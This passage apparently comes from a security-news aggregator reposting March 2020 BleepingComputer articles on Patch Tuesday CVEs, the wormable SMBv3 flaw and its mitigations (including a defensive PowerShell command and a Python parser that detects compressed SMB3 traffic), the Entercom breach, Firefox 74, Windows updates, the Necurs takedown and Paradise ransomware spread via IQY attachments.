"The exploitation of this vulnerability opens systems up to a "wormable" attack, which means it would be easy to move from victim to victim," Cisco Talos stated.

Unfortunately, not much other information is available, other than that disabling SMBv3 compression will allegedly mitigate the vulnerability and that everyone should block public access to port 445.

For more detailed information on this vulnerability and how to disable SMBv3 compression, please see our dedicated "Microsoft Leaks Info on Wormable Windows SMBv3 CVE-2020-0796 Flaw" article.

BleepingComputer has sent multiple emails to Microsoft but has not heard back yet with an official statement.

This month's interesting vulnerabilities
Stealing source code with CVE-2020-0872
The CVE-2020-0872 vulnerability titled "Remote Code Execution Vulnerability in Application Inspector" can be used by a malicious actor to try and steal the source code of files opened in Application Inspector.

"A remote code execution vulnerability exists in Application Inspector version v1.0.23 or earlier when the tool reflects example code snippets from third-party source files into its HTML output. An attacker who exploited it could send sections of the report containing code snippets to an external server.

To exploit the vulnerability, an attacker needs to convince a user to run Application Inspector on source code that includes a malicious third-party component."

More info can be found here.

Weaponized LNK files and Word documents
Two new vulnerabilities were fixed today that could allow attackers to create specially crafted .LNK files or Word documents that can perform code execution when opened.

The first vulnerability is CVE-2020-0684 and is titled "LNK Remote Code Execution Vulnerability" and allows an attacker to create malicious LNK files that can perform code execution. If we see a large spam campaign using .LNK files in the near future, we know someone came up with a PoC.

The second vulnerability is CVE-2020-0852 and is titled "Microsoft Word Remote Code Execution Vulnerability". This vulnerability would allow an attacker to create malicious Word documents that perform code execution simply by opening them.

Even worse, this vulnerability works in Outlook's preview pane.

The March 2020 Patch Tuesday Security Updates
Below is the full list of resolved vulnerabilities and released advisories in the March 2020 Patch Tuesday updates. To access the full description of each vulnerability and the systems that it affects, you can view the full report here.

Tag CVE ID CVE Title Severity
Azure CVE-2020-0902 Service Fabric Elevation of Privilege Important
Azure DevOps CVE-2020-0758 Azure DevOps Server and Team Foundation Services Elevation of Privilege Vulnerability Important
Azure DevOps CVE-2020-0815 Azure DevOps Server and Team Foundation Services Elevation of Privilege Vulnerability Important
Azure DevOps CVE-2020-0700 Azure DevOps Server Cross-site Scripting Vulnerability Important
Internet Explorer CVE-2020-0824 Internet Explorer Memory Corruption Vulnerability Critical
Microsoft Browsers CVE-2020-0768 Scripting Engine Memory Corruption Vulnerability Critical
Microsoft Dynamics CVE-2020-0905 Dynamics Business Central Remote Code Execution Vulnerability Critical
Microsoft Edge CVE-2020-0816 Microsoft Edge Memory Corruption Vulnerability Critical
Microsoft Exchange Server CVE-2020-0903 Microsoft Exchange Server Spoofing Vulnerability Important
Microsoft Graphics Component CVE-2020-0774 Windows GDI Information Disclosure Vulnerability Important
Microsoft Graphics Component CVE-2020-0788 Win32k Elevation of Privilege Vulnerability Important
Microsoft Graphics Component CVE-2020-0791 Windows Graphics Component Elevation of Privilege Vulnerability Important
Microsoft Graphics Component CVE-2020-0690 DirectX Elevation of Privilege Vulnerability Important
Microsoft Graphics Component CVE-2020-0853 Windows Imaging Component Information Disclosure Vulnerability Important
Microsoft Graphics Component CVE-2020-0877 Win32k Elevation of Privilege Vulnerability Important
Microsoft Graphics Component CVE-2020-0882 Windows GDI Information Disclosure Vulnerability Important
Microsoft Graphics Component CVE-2020-0883 GDI+ Remote Code Execution Vulnerability Critical
Microsoft Graphics Component CVE-2020-0881 GDI+ Remote Code Execution Vulnerability Critical
Microsoft Graphics Component CVE-2020-0880 Windows GDI Information Disclosure Vulnerability Important
Microsoft Graphics Component CVE-2020-0887 Win32k Elevation of Privilege Vulnerability Important
Microsoft Graphics Component CVE-2020-0898 Windows Graphics Component Elevation of Privilege Vulnerability Important
Microsoft Graphics Component CVE-2020-0885 Windows Graphics Component Information Disclosure Vulnerability Important
Microsoft Office CVE-2020-0850 Microsoft Word Remote Code Execution Vulnerability Important
Microsoft Office CVE-2020-0852 Microsoft Word Remote Code Execution Vulnerability Critical
Microsoft Office CVE-2020-0892 Microsoft Word Remote Code Execution Vulnerability Important
Microsoft Office CVE-2020-0851 Microsoft Word Remote Code Execution Vulnerability Important
Microsoft Office CVE-2020-0855 Microsoft Word Remote Code Execution Vulnerability Important
Microsoft Office SharePoint CVE-2020-0795 Microsoft SharePoint Reflective XSS Vulnerability Important
Microsoft Office SharePoint CVE-2020-0891 Microsoft SharePoint Reflective XSS Vulnerability Important
Microsoft Office SharePoint CVE-2020-0893 Microsoft Office SharePoint XSS Vulnerability Important
Microsoft Office SharePoint CVE-2020-0894 Microsoft Office SharePoint XSS Vulnerability Important
Microsoft Scripting Engine CVE-2020-0830 Scripting Engine Memory Corruption Vulnerability Critical
Microsoft Scripting Engine CVE-2020-0829 Scripting Engine Memory Corruption Vulnerability Critical
Microsoft Scripting Engine CVE-2020-0813 Scripting Engine Information Disclosure Vulnerability Important
Microsoft Scripting Engine CVE-2020-0826 Scripting Engine Memory Corruption Vulnerability Critical
Microsoft Scripting Engine CVE-2020-0827 Scripting Engine Memory Corruption Vulnerability Critical
Microsoft Scripting Engine CVE-2020-0825 Scripting Engine Memory Corruption Vulnerability Critical
Microsoft Scripting Engine CVE-2020-0831 Scripting Engine Memory Corruption Vulnerability Critical
Microsoft Scripting Engine CVE-2020-0847 VBScript Remote Code Execution Vulnerability Moderate
Microsoft Scripting Engine CVE-2020-0811 Chakra Scripting Engine Memory Corruption Vulnerability Critical
Microsoft Scripting Engine CVE-2020-0828 Scripting Engine Memory Corruption Vulnerability Critical
Microsoft Scripting Engine CVE-2020-0848 Scripting Engine Memory Corruption Vulnerability Critical
Microsoft Scripting Engine CVE-2020-0823 Scripting Engine Memory Corruption Vulnerability Critical
Microsoft Scripting Engine CVE-2020-0832 Scripting Engine Memory Corruption Vulnerability Moderate
Microsoft Scripting Engine CVE-2020-0812 Chakra Scripting Engine Memory Corruption Vulnerability Critical
Microsoft Scripting Engine CVE-2020-0833 Scripting Engine Memory Corruption Vulnerability Critical
Microsoft Windows CVE-2020-0897 Windows Work Folder Service Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0896 Windows Hard Link Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0871 Windows Network Connections Service Information Disclosure Vulnerability Important
Microsoft Windows CVE-2020-0874 Windows GDI Information Disclosure Vulnerability Important
Microsoft Windows CVE-2020-0876 Win32k Information Disclosure Vulnerability Important
Microsoft Windows CVE-2020-0775 Windows Error Reporting Information Disclosure Vulnerability Important
Microsoft Windows CVE-2020-0879 Windows GDI Information Disclosure Vulnerability Important
Microsoft Windows CVE-2020-0793 Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0776 Windows Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0869 Media Foundation Memory Corruption Vulnerability Critical
Microsoft Windows CVE-2020-0861 Windows Network Driver Interface Specification (NDIS) Information Disclosure Vulnerability Important
Microsoft Windows CVE-2020-0863 Connected User Experiences and Telemetry Service Information Disclosure Vulnerability Important
Microsoft Windows CVE-2020-0860 Windows ActiveX Installer Service Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0857 Windows Search Indexer Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0858 Windows Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0865 Windows Work Folder Service Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0866 Windows Work Folder Service Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0864 Windows Work Folder Service Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0820 Media Foundation Information Disclosure Vulnerability Important
Microsoft Windows CVE-2020-0819 Windows Device Setup Manager Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0804 Windows Network Connections Service Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0779 Windows Installer Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0802 Windows Network Connections Service Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0803 Windows Network Connections Service Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0778 Windows Network Connections Service Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0809 Media Foundation Memory Corruption Vulnerability Critical
Microsoft Windows CVE-2020-0810 Diagnostic Hub Standard Collector Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0807 Media Foundation Memory Corruption Vulnerability Critical
Microsoft Windows CVE-2020-0808 Provisioning Runtime Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0797 Windows Work Folder Service Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0785 Windows User Profile Service Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0786 Windows Tile Object Service Denial of Service Vulnerability Important
Microsoft Windows CVE-2020-0787 Windows Background Intelligent Transfer Service Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0783 Windows UPnP Service Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0800 Windows Work Folder Service Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0801 Media Foundation Memory Corruption Vulnerability Critical
Microsoft Windows CVE-2020-0781 Windows UPnP Service Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0780 Windows Network List Service Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0777 Windows Work Folder Service Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0772 Windows Error Reporting Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0849 Windows Hard Link Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0845 Windows Network Connections Service Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0684 LNK Remote Code Execution Vulnerability Critical
Microsoft Windows CVE-2020-0769 Windows CSC Service Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0771 Windows CSC Service Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0841 Windows Hard Link Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0840 Windows Hard Link Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0806 Windows Error Reporting Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0843 Windows Installer Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0844 Connected User Experiences and Telemetry Service Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0842 Windows Installer Elevation of Privilege Vulnerability Important
Open Source Software CVE-2020-0872 Remote Code Execution Vulnerability in Application Inspector Important
Other CVE-2020-0765 Remote Desktop Connection Manager Information Disclosure Vulnerability Moderate
Visual Studio CVE-2020-0789 Visual Studio Extension Installer Service Denial of Service Vulnerability Important
Visual Studio CVE-2020-0884 Microsoft Visual Studio Spoofing Vulnerability Important
Windows Defender CVE-2020-0763 Windows Defender Security Center Elevation of Privilege Vulnerability Important
Windows Defender CVE-2020-0762 Windows Defender Security Center Elevation of Privilege Vulnerability Important
Windows Diagnostic Hub CVE-2020-0854 Windows Mobile Device Management Diagnostics Elevation of Privilege Vulnerability Important
Windows IIS CVE-2020-0645 Microsoft IIS Server Tampering Vulnerability Important
Windows Installer CVE-2020-0814 Windows Installer Elevation of Privilege Vulnerability Important
Windows Installer CVE-2020-0773 Windows ActiveX Installer Service Elevation of Privilege Vulnerability Important
Windows Installer CVE-2020-0770 Windows ActiveX Installer Service Elevation of Privilege Vulnerability Important
Windows Installer CVE-2020-0822 Windows Language Pack Installer Elevation of Privilege Vulnerability Important
Windows Installer CVE-2020-0859 Windows Modules Installer Service Information Disclosure Vulnerability Important
Windows Installer CVE-2020-0868 Windows Update Orchestrator Service Elevation of Privilege Vulnerability Important
Windows Installer CVE-2020-0798 Windows Installer Elevation of Privilege Vulnerability Important
Windows Installer CVE-2020-0867 Windows Update Orchestrator Service Elevation of Privilege Vulnerability Important
Windows Kernel CVE-2020-0834 Windows ALPC Elevation of Privilege Vulnerability Important
Windows Kernel CVE-2020-0799 Windows Kernel Elevation of Privilege Vulnerability Important
Update 3/10/20: Fixed incorrect title


Microsoft Leaks Info on Wormable Windows SMBv3 CVE-2020-0796 Flaw
14.3.2020 
Bleepingcomputer  OS

Microsoft leaked info on a security update for a 'wormable' pre-auth remote code execution vulnerability found in the Server Message Block 3.0 (SMBv3) network communication protocol that reportedly should have been disclosed as part of this month's Patch Tuesday.

The vulnerability is due to an error in how SMBv3 handles maliciously crafted compressed data packets, and it allows remote, unauthenticated attackers to execute arbitrary code within the context of the application.

Even though the vulnerability advisory was not published by Microsoft (no explanation for this has been released by Redmond so far), a number of security vendors that are part of the Microsoft Active Protections Program, and so get early access to vulnerability information, did release details on the security flaw tracked as CVE-2020-0796.

MalwareHunterTeam
@malwrhunterteam
CVE-2020-0796 - a "wormable" SMBv3 vulnerability.
Great...
😂

7:01 PM - Mar 10, 2020
Desktop and server Windows 10 versions impacted
Devices running Windows 10 Version 1903, Windows Server Version 1903 (Server Core installation), Windows 10 Version 1909, and Windows Server Version 1909 (Server Core installation) are impacted by this vulnerability according to a Fortinet advisory, although more versions should be affected given that SMBv3 was introduced in Windows 8 and Windows Server 2012.

"An attacker could exploit this bug by sending a specially crafted packet to the target SMBv3 server, which the victim needs to be connected to," Cisco Talos explained in their Microsoft Patch Tuesday report — this was later removed by the Talos security experts.

"The exploitation of this vulnerability opens systems up to a 'wormable' attack, which means it would be easy to move from victim to victim," they also added.

Fortinet says that upon successful exploitation, CVE-2020-0796 could allow remote attackers to take full control of vulnerable systems.

Due to Microsoft's secrecy, people are coming up with their own theories regarding the vulnerability and its severity, some comparing it to EternalBlue, NotPetya, WannaCry, or MS17-010 (1, 2).

Others have already started coming up with names for the vulnerability such as SMBGhost, DeepBlue 3: Redmond Drift, Bluesday, CoronaBlue, and NexternalBlue.

Available CVE-2020-0796 mitigations
Until Microsoft releases a security update that patches the CVE-2020-0796 RCE vulnerability, Cisco Talos says that disabling SMBv3 compression and blocking TCP port 445 on client computers and firewalls should block attempts to exploit the flaw.

While no proof-of-concept exploits have been released yet for this wormable SMBv3 RCE, we recommend implementing the mitigation measures shared by Cisco Talos until Microsoft releases an out-of-cycle security update to fix it, seeing that almost all the information is out anyway.

BleepingComputer has reached out to Microsoft for more details but had not heard back at the time of this publication.

Brian in Pittsburgh
@arekfurt
If you're Microsoft you basically have little choice now but to release the patch for 2020-0796 out-of-cycle as soon as it meets quality standards, right? There's too much info out there to just hope somebody won't find it before April.

Fun times for sysadmins everywhere.

8:49 PM - Mar 10, 2020
Update: Microsoft published a security advisory with details on how to disable SMBv3 compression to protect servers against exploitation attempts.

You can disable compression on SMBv3 servers with this PowerShell command (no reboot required; note that it does not protect SMB clients from exploitation):

Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 1 -Force

What steps can I take to protect my network?

1. Block TCP port 445 at the enterprise perimeter firewall

TCP port 445 is used to initiate a connection with the affected component. Blocking this port at the network perimeter firewall will help protect systems that are behind that firewall from attempts to exploit this vulnerability. This can help protect networks from attacks that originate outside the enterprise perimeter. Blocking the affected ports at the enterprise perimeter is the best defense to help avoid Internet-based attacks. However, systems could still be vulnerable to attacks from within their enterprise perimeter.

2. Follow Microsoft guidelines to prevent SMB traffic leaving the corporate environment

Guidelines for blocking specific firewall ports to prevent SMB traffic from leaving the corporate environment
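The workaround above only changes a registry value, so a defender will want to confirm on the wire that compressed SMBv3 segments have actually stopped, and to alert on compressed SMB that reaches TCP 445 from outside the perimeter. The following Python is an added example, not code from the article, Microsoft's advisory or Cisco Talos: it decodes the public SMB2 compression transform header (field layout as documented in MS-SMB2 section 2.2.42) that prefixes every compressed SMBv3 segment, and classifies a captured TCP 445 segment as plain, compressed, or not SMB2 at all. The sample segments are constructed, not captured traffic.

```python
import struct
from dataclasses import dataclass
from typing import Optional

# Added example: decode the SMB2 COMPRESSION_TRANSFORM_HEADER so a sensor or
# pcap triage script can tell compressed SMBv3 segments from plain ones.
# Not code from the article or from Microsoft; samples below are constructed.

SMB2_COMPRESSION_MAGIC = b"\xfcSMB"   # ProtocolId of a compressed segment: 0xFC 'S' 'M' 'B'
SMB2_MAGIC = b"\xfeSMB"               # ProtocolId of a plain SMB2/SMB3 header, for contrast

# CompressionAlgorithm values from MS-SMB2
ALGORITHMS = {
    0x0000: "NONE",
    0x0001: "LZNT1",
    0x0002: "LZ77",
    0x0003: "LZ77+Huffman",
    0x0004: "Pattern_V1",
}
FLAG_CHAINED = 0x0001


@dataclass
class CompressedSegment:
    original_size: int      # OriginalCompressedSegmentSize (size after decompression)
    algorithm: str
    chained: bool           # SMB2_COMPRESSION_FLAG_CHAINED set
    offset_or_length: int   # Offset/Length field
    payload_len: int        # bytes actually present after the 16-byte header


def strip_direct_tcp_header(segment: bytes) -> bytes:
    """SMB over direct TCP prefixes each message with a zero byte and a
    24-bit big-endian length. Return the SMB message body."""
    if len(segment) < 4 or segment[0] != 0:
        raise ValueError("not a direct-TCP SMB segment")
    length = int.from_bytes(segment[1:4], "big")
    body = segment[4:4 + length]
    if len(body) != length:
        raise ValueError("truncated SMB segment")
    return body


def parse_compression_header(message: bytes) -> Optional[CompressedSegment]:
    """Return the transform header fields if `message` is a compressed
    SMB3 segment, or None if it is anything else."""
    if not message.startswith(SMB2_COMPRESSION_MAGIC):
        return None
    if len(message) < 16:
        raise ValueError("compression transform header truncated")
    # <4sIHHI: ProtocolId, OriginalCompressedSegmentSize, CompressionAlgorithm,
    # Flags, Offset/Length, all little-endian.
    _, orig_size, algo, flags, off_len = struct.unpack_from("<4sIHHI", message, 0)
    return CompressedSegment(
        original_size=orig_size,
        algorithm=ALGORITHMS.get(algo, f"unknown(0x{algo:04x})"),
        chained=bool(flags & FLAG_CHAINED),
        offset_or_length=off_len,
        payload_len=len(message) - 16,
    )


def classify_segment(segment: bytes, from_outside_perimeter: bool) -> str:
    """Verdict for one TCP 445 segment. After DisableCompression is set on
    every server, no segment should classify as 'compressed:*'."""
    body = strip_direct_tcp_header(segment)
    hdr = parse_compression_header(body)
    if hdr is None:
        return "plain" if body.startswith(SMB2_MAGIC) else "not-smb2"
    if from_outside_perimeter:
        return "ALERT: compressed SMB3 from outside perimeter"
    return f"compressed:{hdr.algorithm}"


def _direct_tcp(body: bytes) -> bytes:
    """Wrap an SMB message in the 4-byte direct-TCP transport header."""
    return b"\x00" + len(body).to_bytes(3, "big") + body


# Constructed sample segments (not real captures).
SAMPLE_COMPRESSED = _direct_tcp(
    struct.pack("<4sIHHI", SMB2_COMPRESSION_MAGIC, 1024, 0x0002, 0x0000, 0)
    + b"\x11" * 32
)
SAMPLE_PLAIN = _direct_tcp(SMB2_MAGIC + b"\x00" * 60)   # zeroed 64-byte SMB2 header

if __name__ == "__main__":
    for name, seg in (("compressed", SAMPLE_COMPRESSED), ("plain", SAMPLE_PLAIN)):
        print(name, classify_segment(seg, from_outside_perimeter=False))
```

Feed it the reassembled TCP payloads from a capture on port 445 before and after rolling out the registry change; any remaining `compressed:*` verdict points at a host where the workaround did not take.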


Entercom Radio Giant Says Data Breach Exposed User Credentials
14.3.2020 
Bleepingcomputer  Incident

US radio giant Entercom reported a data breach that took place in August 2019, after an unauthorized party was able to access database backup files stored on third-party cloud hosting services and containing Radio.com user credentials.

Entercom's national network comprises more than 235 radio stations broadcasting news, sports, and music across the country, and its Radio.com online live streaming service reaches over 170 million people each month.

"As one of the country’s two largest radio broadcasters, Entercom offers integrated marketing solutions and delivers the power of local connection on a national scale with coverage of close to 90% of persons 12+ in the top 50 markets," the company says.

Data breach exposes Radio.com users' credentials
Entercom says in a notice of data breach sent to affected customers and filed with California's Office of the Attorney General that the data breach was detected while investigating a cyberattack that took place in September 2019.

"As part of our investigation into that attack, we became aware of unauthorized activity relating to third-party cloud hosting services, which we use to store information relating to Radio.com users," Entercom explains.

"Specifically, our investigation determined that for approximately three (3) hours on August 4, 2019, an unauthorized actor accessed information relating to Radio.com users contained in database backup files."

The company discovered that an unauthorized actor was able to access the protected personal information of an undisclosed number of Radio.com users.

During the investigation conducted with the help of third-party data privacy and computer forensics specialists, Entercom discovered that the attacker was able to gain access to the names, usernames, and passwords of the impacted Radio.com users.

We sincerely regret any inconvenience this incident may cause you. We remain committed to safeguarding the information in our care and will continue to take steps to ensure the security of our systems. - Radio.com Customer Support Team

Following the data breach, the radio giant implemented several measures designed to prevent similar incidents in the future, including but not limited to password rotations, multifactor authentication for cloud services, stronger password policies, and staff data security training.

Entercom also urges users who received the data breach notification letters to change their passwords for Radio.com accounts and for any other accounts where the same password was used.

This suggests that the credentials accessed during the data breach were stored in plain text, something BleepingComputer tried to confirm by reaching out to an Entercom spokesperson but did not hear back at the time of publication.

Previous attacks targeting Entercom
This is the third time in the last year that Entercom was targeted in a security incident. Last September, a cyberattack that had all the signs of a ransomware attack affected all Entercom offices across the country.

At the time, online reports said that the attackers asked for a $500,000 ransom and the attack led to the disruption of telephone and email communication, music scheduling, production, billing, and various other internal digital systems.

In response to a media inquiry, Entercom said that they are "experiencing a disruption of some IT systems, including email." However, an internal memo explaining what was happening to employees also prohibited them from sharing any of the information outside the company.

Just before Christmas Eve, in December 2019, Entercom suffered a second cyberattack that caused Internet connectivity problems, disabling email communication, access to files, and the delivery of content to the radio network's digital platforms.


Firefox 74 Released: Security Fixes, Improvements, and Fixes
14.3.2020 
Bleepingcomputer  Vulnerability

Mozilla has released Firefox 74 today, March 10th, 2020, to the Stable desktop channel for Windows, macOS, and Linux with bug fixes, new features, and security fixes.

Included with this release are new features such as the Facebook Container, the blocking of sideloaded add-ons, and the disabling of TLS 1.0 and 1.1 support.

Windows, Mac, and Linux desktop users can upgrade to Firefox 74.0 by going to Options -> Help -> About Firefox and the browser will automatically check for the new update and install it when available.


With the release of Firefox 74, the other development branches of Firefox have also moved up a version. This brings Firefox Beta to version 75 and the Nightly builds to version 76.

You can download Firefox 74 from the following links:

Firefox 74 for Windows 64-bit
Firefox 74 for Windows 32-bit
Firefox 74 for macOS
Firefox 74 for Linux 64-bit
Firefox 74 for Linux 32-bit
If the above links have not been updated for Firefox 74 as of yet, you can download it from their FTP release directory.

Below are the major changes in Firefox 74; those who wish to read the full changelog can do so here.

New Facebook Container
When users start Firefox 74 for the first time they will be greeted with a new screen asking if they wish to install the Facebook container.

Facebook Container promotion
When the Facebook container is installed, all of your Facebook sessions will be isolated so that they can no longer track your activities between different sites.

Or as Mozilla likes to say it:

It’s okay to like Facebook

If you still kinda like Facebook but don’t trust them, then try the Facebook Container extension by Firefox and make it harder for them to track you around the web.

Add-ons can no longer be sideloaded by external applications
Starting today with Firefox 74, add-ons can no longer be installed via external applications.

Malicious programs have long been installing unwanted add-ons or extensions without a user's knowledge. With this change, malware developers will no longer be able to install malicious extensions through adware bundles or other installers.

These are the new Firefox 74 changes related to add-ons:

Starting with Firefox 74, users will need to take explicit action to install the extensions they want, and will be able to remove previously sideloaded extensions when they want to.
Previously installed sideloaded extensions will not be uninstalled for users when they update to Firefox 74. If a user no longer wants an extension that was sideloaded, they must uninstall the extension themselves.
Firefox will prevent new extensions from being sideloaded.
Developers will be able to push updates to extensions that had previously been sideloaded. (If you are the developer of a sideloaded extension and you are now distributing your extension through your website or AMO, please note that you will need to separately update the sideloaded extension and the distributed extension.)
TLS 1.0 and 1.1 support is now disabled by default
With the more secure TLS 1.2 and TLS 1.3 protocols available, Mozilla is now disabling support for the TLS 1.0 and TLS 1.1 protocol versions by default starting in this release.

When a user visits a site that only supports the older TLS 1.0 or 1.1 protocols, Firefox will display an override button that allows you to 'Enable TLS 1.0 and 1.1' for that web site connection.

TLS override
This override will continue to be available while Firefox collects telemetry to determine how many sites still rely on the old protocol versions.

Eventually, the override button will be removed and all support for TLS 1.0 and TLS 1.1 will be removed.

Other bug fixes, improvements, and developer changes
In addition to new features, Firefox 74 also adds a variety of improvements and bug fixes, which are listed below:

Your login management has improved with the ability to reverse alpha sort (Name Z-A) in Lockwise, which you can access under Logins and Passwords.
Firefox now makes importing your bookmarks and history from the new Microsoft Edge browser on Windows and Mac simple.
Firefox now provides better privacy for your web voice and video calls through support for mDNS ICE by cloaking your computer’s IP address with a random ID in certain WebRTC scenarios.
We have fixed issues involving pinned tabs such as being lost. You should also no longer see them reorder themselves.
When a video is uploaded with a batch of photos on Instagram, the Picture-in-Picture toggle would sit atop of the “next” button. The toggle is now moved allowing you to flip through to the next image of the batch.
On Windows, Ctrl+I can now be used to open the Page Info window instead of opening the Bookmarks sidebar. Ctrl+B still opens the Bookmarks sidebar making keyboard shortcuts more useful for our users.
Firefox’s Debugger added support for debugging Nested Web Workers, so their execution can be paused and stepped through with breakpoints.
Firefox has added support for the new JavaScript optional chaining operator (?.) and CSS text-underline-position.
Security vulnerabilities fixed
With the release of Firefox 74, Mozilla has also fixed a total of 12 security vulnerabilities in the browser.

Of these vulnerabilities, 5 are classified as 'High', 6 as 'Moderate', and 1 is classified as 'Low'.

All of the vulnerabilities classified as High could lead to an exploitable crash or possibly remote code execution.


Windows 10 Cumulative Update KB4540673 & KB4538461 Released
14.3.2020 
Bleepingcomputer  OS

It's March 2020, today is Patch Tuesday, and Microsoft is rolling out a new cumulative update for all supported versions of Windows. The cumulative update with security fixes is rolling out to PCs running the November 2019 Update, May 2019 Update, and October 2018 Update.

The March 2020 cumulative update for Windows 10 versions 1909, 1903, and 1809 contains only security enhancements for the system, browsers, core components, and other basic functions.

Like every Windows Update, you can open the Settings app and click on the Windows Update option to install the patches. If you own multiple PCs or if you would like to patch the PCs manually, you can learn more about it here.

Build 18362.719 for Windows 10 v1903 & Build 18363.719 for Windows 10 v1909
The March 2020 cumulative update (KB4540673) brings Windows 10 version 1909 to Build 18363.719 and Windows 10 version 1903 to Build 18362.719. The improvements are only security fixes:

Addresses an issue that prevents certain users from upgrading the OS because of corrupted third-party assemblies.
Security updates to Windows App Platform and Frameworks, Windows Media, Windows Silicon Platform, Microsoft Edge, Internet Explorer, Windows Fundamentals, Windows Authentication, Windows Peripherals, Windows Update Stack, and Windows Server.
Updates to improve security when using external devices (such as game controllers, printers, and web cameras).
Updates to improve security when using Microsoft Edge and Internet Explorer.
Updates for verifying user names and passwords.
Microsoft is aware of one bug:

Symptom: When using Windows Server containers with the March 10, 2020 updates, you might encounter issues with 32-bit applications and processes.
Workaround: For important guidance on updating Windows containers, please see Windows container version compatibility.
Build 17763.1098 for Windows 10 version 1809
If you're still on the October 2018 Update, here's what's new and improved in this release for you:

Updates to improve security when using Microsoft Edge and Internet Explorer.
Updates for verifying user names and passwords.
Updates to improve security when Windows performs basic operations.
Updates for storing and managing files.
Updates to improve security when using external devices (such as game controllers, printers, and web cameras).


Microsoft Takes Control of Necurs U.S.-Based Infrastructure
14.3.2020 
Bleepingcomputer  BigBrothers

Microsoft announced today that it took over the U.S.-based infrastructure used by the Necurs spam botnet for distributing malware payloads and infecting millions of computers.

A single Necurs-infected device was observed while sending roughly 3.8 million spam messages to more than 40.6 million targets during 58 days according to Microsoft's investigation.

"On Thursday, March 5, the U.S. District Court for the Eastern District of New York issued an order enabling Microsoft to take control of U.S.-based infrastructure Necurs uses to distribute malware and infect victim computers," Microsoft Corporate Vice President for Customer Security & Trust Tom Burt said.

"With this legal action and through a collaborative effort involving public-private partnerships around the globe, Microsoft is leading activities that will prevent the criminals behind Necurs from registering new domains to execute attacks in the future."

The Necurs botnet
Necurs is today's largest spam botnet, initially spotted around 2012 and linked by some sources to the TA505 cybercrime group, the operators behind the Dridex banking trojan.

Microsoft says that the botnet "has also been used to attack other computers on the internet, steal credentials for online accounts, and steal people’s personal information and confidential data."

The botnet was also seen delivering messages pushing fake pharmaceutical spam email, pump-and-dump stock scams, and “Russian dating” scams.

The Necurs malware is also modular: besides the spam-delivery modules Microsoft observed, it has modules for redirecting traffic via HTTPS and SOCKS network proxies deployed on infected devices, and a DDoS (distributed denial of service) module introduced in 2017, although no Necurs DDoS attacks have been detected so far.

Necurs' operators also run a botnet-for-hire service, renting the botnet to other cybercriminals who use it to distribute various flavors of info-stealing, cryptomining, and ransomware payloads.

Microsoft's Necurs takedown
Microsoft was able to take control of the botnet domains by "analyzing a technique used by Necurs to systematically generate new domains through an algorithm."

This allowed them to predict more than six million domains the botnet's operators would have created and used as infrastructure during the next two years.

"Microsoft reported these domains to their respective registries in countries around the world so the websites can be blocked and thus prevented from becoming part of the Necurs infrastructure," Burt added.

"By taking control of existing websites and inhibiting the ability to register new ones, we have significantly disrupted the botnet."

Redmond has also joined forces with Internet Service Providers (ISPs) and other industry partners to help detect and remove the Necurs malware from as many infected computers as possible.

"This remediation effort is global in scale and involves collaboration with partners in industry, government and law enforcement via the Microsoft Cyber Threat Intelligence Program (CTIP)," Burt said.

"For this disruption, we are working with ISPs, domain registries, government CERTs and law enforcement in Mexico, Colombia, Taiwan, India, Japan, France, Spain, Poland and Romania, among others."


Paradise Ransomware Distributed via Uncommon Spam Attachment
14.3.2020 
Bleepingcomputer  Ransomware

Attackers have started to send Excel Web Query attachments in phishing campaigns to download and install the Paradise Ransomware on unsuspecting victims.

Paradise Ransomware is fairly old with activity going as far back as September 2017 when it was first reported by a victim in the BleepingComputer forums.

Since then, there has been a steady trickle of victims from this ransomware as can be seen from the submissions to the ransomware identification site ID-Ransomware.

Paradise Ransomware submissions to ID Ransomware
IQY attachments are easy to make and not often used
In a new spam campaign detected by cybersecurity firm LastLine, Paradise Ransomware distributors were found to be sending emails pretending to be offers, orders, or keys.

Attached to these emails were IQY files that, when opened, connect to a remote URL hosting PowerShell commands, which are then executed to download and install the Paradise Ransomware.

If you are not familiar with IQY attachments, they are simply text files that instruct Excel to run a web query and use its output as a data source in a spreadsheet.

The problem is that these files can also import data from remote URLs containing Excel formulas that can launch local applications, such as PowerShell commands, on the victim's computer.

As you can see from the Paradise Ransomware IQY file below, it only contains text that tells Excel that the data source is from the web and what URL to retrieve the data from.

